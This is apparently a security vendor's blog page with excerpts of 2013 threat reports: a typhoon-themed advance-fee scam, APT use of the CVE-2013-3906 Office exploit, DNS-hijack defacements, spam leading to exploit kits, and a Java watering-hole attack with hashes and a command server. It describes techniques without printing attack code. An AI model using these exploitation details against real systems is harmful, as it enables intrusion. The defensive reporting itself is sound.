18 Nov A typhoon worth millions Tatyana Shcherbakova
14 Nov The rush for CVE-2013-3906 - a hot commodity Dmitry Tarakanov
11 Nov CVE-2013-3906 : another 0-day for Microsoft Office Vyacheslav Zakorzhevsky
08 Oct Hackers target high profile domains David Jacoby
24 Sep Exposing the security weaknesses we tend to overlook David Jacoby
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
In early November Typhoon Haiyan devastated the Philippines, with a catastrophic numbers of victims – several thousand were reported killed, while hundreds of thousands were evacuated. A few days after the typhoon struck we detected the first “Nigerian letters” in which scammers were exploiting the tragedy for their own selfish ends. The author of the letter below pretended to be a driver at a local security company. The tale of how he became a multi-millionaire sounds plausible enough.
The typhoon supposedly left the driver alone with a cargo of $11.5 million. Realizing he had lost his security escort and that the money was probably presumed lost, he decided to make the most of his predicament and conveyed the money to an associate at another security company. In the letter he is asking the recipient to help transfer the valuable cargo out of the Philippines in return for a generous reward. To add a touch of authenticity, the scammer added real links to news about the typhoon – mostly to the BBC. The news articles are the only reliable information provided in the letter. This amazing story of a newly-made millionaire, along with his name and surname are merely trying to deceive an unsuspecting recipient.
Two days ago FireEye reported that the recent CVE-2013-3906 exploit has begun to be used by new threat actors other than the original ones. The new infected documents share similarities with previously detected exploits but carry a different payload. This time these exploits are being used to deliver Taidoor and PlugX backdoors, according to FireEye.
At Kaspersky Lab we have also detected that yet another APT group has just started spreading malicious MS Word documents exploiting CVE-2013-3906. This APT actor is the Winnti group, which we described in detail here. They have sent spear-phishing emails with an attached document containing the exploit. As usual the Winnti perpetrators are trying to use this technique to deliver 1st stage malware - PlugX.
We became aware of an attack against one gaming company which constantly undergoes attacks from the Winnti group. The MS Word document containing the exploit shows the same TIFF “picture” - 7dd89c99ed7cec0ebc4afa8cd010f1f1 – that triggers the exploitation of the vulnerability, as in the Hangover attacks. If the exploitation is successful, the PlugX backdoor is downloaded from a remote URL:
On November 5, Microsoft announced the discovery of a new vulnerability CVE-2013-3906 which can be exploited when TIFF images are processed. By exploiting this vulnerability it is possible to attack software – including Microsoft Office and Lync – that uses a vulnerable DLL for processing TIFF images. On the same day, there were reports that Microsoft had recorded attacks that exploit CVE-2013-3906.
Several malware samples became available to us that exploit CVE-2013-3906. We analyzed them in detail. All of them make use of heap spraying, recording their code to the address 0x08080808, and execute the code from that location. Exception generation and memory rewrite is performed in the vulnerable ogl.dll.
Fragment of WinDbg shellcode execution
The exploits that we had access to can be divided into two groups according to the shellcodes used in them.
During the last days, several high profile domains have been defaced including domains from two prominent security companies. In addition to these, high profile domains such as alexa.com, whatsapp.com and redtube.com were also defaced. From our quick analysis It does not seem that the actual webserver has been compromised, the most possible attack vector was that the DNS have been hijacked.
When looking into this, there are some quite obvious traces but nothing that really confirms what the hackers did; or what kind of information they were able to obtain. When analyzing previous compromises and defaces it seems that there is a "new" trend within hacking groups and defacers to go for the DNS or domain registrars instead of compromising the actual webserver. When quickly analyzing the domain there were two indicators that stood out.
As a security analyst we often get asked the question: “What threats and vulnerabilities do you expect us to see in the future?” This is a very interesting question but also an indication that the way we think about and discuss IT-security is fundamentally wrong. Do we really need to invest time and resources to focus on future threats when we are still vulnerable to attacks that have been discussed for over 20 years?
If you take a look at some of the major breaches we have seen in the past, the attackers did not use zero day vulnerabilities. Also if you look in the exploit kits, only very few are actually equipped with exploits taking advantage of zero day vulnerabilities. To analyze this in depth, Kaspersky researcher David Jacoby joined forces with Outpost24’s CSO Martin Jartelius, gaining access to unique statistics related to technical risk exposures from the vulnerability management vendor and performed several security audits which included both social engineering tests and penetration tests. However, everything was performed without exploiting any vulnerabilities.
We started to analyze the statistics that we obtained and it did not take very long until our theories were proved to be correct. We looked into the frequency of old vulnerabilities, meaning what vulnerabilities are we actually vulnerable against. We chose to include statistics for Sweden and Benelux in this report.
Even the statistics show that we are quite good at protecting ourselves against vulnerabilities which are new, but strangely enough we have a tendency to forget about older vulnerabilities. Some systems are still vulnerable to vulnerabilities older than 10 years.
Another interesting question is: ‘what systems do we actually try to secure?’ It’s a very hot topic to talk about critical infrastructure, but what other kind of “public resources” are out there which might be critical? What about for example hotels? Or hospitals? Or radio stations for example?
When doing research it’s always important to get real facts, and one of the ways to do this is to get your hands dirty. During our research we also wanted to perform a practical challenge for a few companies from different industries. The idea was to go out and visit the companies and perform a security audit with a pre-defined checklist based on the results from the research. Our goal was to check and see if they had any systems vulnerable to old threats and also review their security routines and a lot of additional tests. However, only a handful of companies actually wanted to participate in this challenge. We both think that this is absolutely one of today’s key problems; we spend rather more time on new exciting vulnerabilities and threats than actually taking care of the real problems. We decided to perform the challenge anyway, and the results were pretty interesting.
Read the full research paper here.
We're currently seeing a spam run which involves a (fake) report from CNN saying that the US have started bombing Syria.
Clicking the shortened link will lead to an exploit kit which targets older, vulnerable versions of Adobe Reader and Java. The attackers favor using the Java exploit over the Reader exploit, as Java exploits are generally more reliable.
The exploit will download a Trojan-Downloader onto the system, which will subsequently download various other malware.
Money mule recruitment emails are nothing new, for years these have been spammed out all over the globe. What is new though is the recent wave aimed at “English-speaking Japanese residents”. It started at the end of July and we have received hundreds of such themed spam emails since then.
The content typically promises an easy job, just requiring some hours per week with very few other requirements.
During the last week, several spear-phishing e-mails were sent to multiple Uyghur activists. Here’s an example:
A snippet of code on the Central Tibetan Administration website redirects CN speaking visitors to a Java exploit that drops an APT-related backdoor. For some context, the site claims the administration itself as "...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet." The selection of placement for the malicious code is fairly extraordinary, so let's dive in.
The attack itself is precisely targeted, as an appended, embedded iframe redirects "xizang-zhiye(dot)org" visitors (this is the CN-translated version of the site) to a java exploit that maintains a backdoor payload. The english and Tibetan versions of the website do not maintain this embedded iframe on the Chinese version (please do not visit at this time). At this point in time, it seems that the few systems attacked with this code are located in China and the US, although there could be more. The Java exploit being delivered is the 212kb "YPVo.jar" (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well. That file is a 397 kb win32 executable "aMCBlHPl.exe" (a6d7edc77e745a91b1fc6be985994c6a) detected as "Trojan.Win32.Swisyn.cyxf". Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is.
The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but it was used by the actor distributing the original CVE-2012-4681 0day Gondzz.class and Gondvv.class in August of last year. You can see the 4681 exploit code in the image above along with code setting the jvm SecurityManager to null to disable Java's policy checks and then running the Payload.main method. The Payload.main method contains some interesting but simple capabilities that enable an attacker to download the payload over https and AES decrypt it using Java's built-in AES crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the jar file's win32 exe resource. The backdoor itself is detected by most of the AV crowd as variants of gaming password stealers, which is flatly incorrect. The related C2 is located at news.worldlinking.com (18.104.22.168).
This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back to at least a busy late 2011 season. We also show Apple related Java exploits from this server targeting the more recent CVE-2013-2423.
UPDATE 2013.08.13: The CN version of the site at "xizang-zhiye(dot)org" appears to be cleaned up and has not been serving any malicious code that I can find over the past day. The administrators appear to have cleaned everything up on early Tuesday their time/later Monday "western" time and there are no indications of any return since. We will continue to monitor the site for signs of compromise.
Around one year ago I posted about what were the most common web attacks in Spain and how the malware was spread. It is time for an update!
We regularly collect data regarding infected web sites based in our detections on KSN. Apart from the general verdicts that I usually find in the top of the rank, there was another one in the top 3 for the last months that caught my eye: Trojan.JS.Iframe.aeq.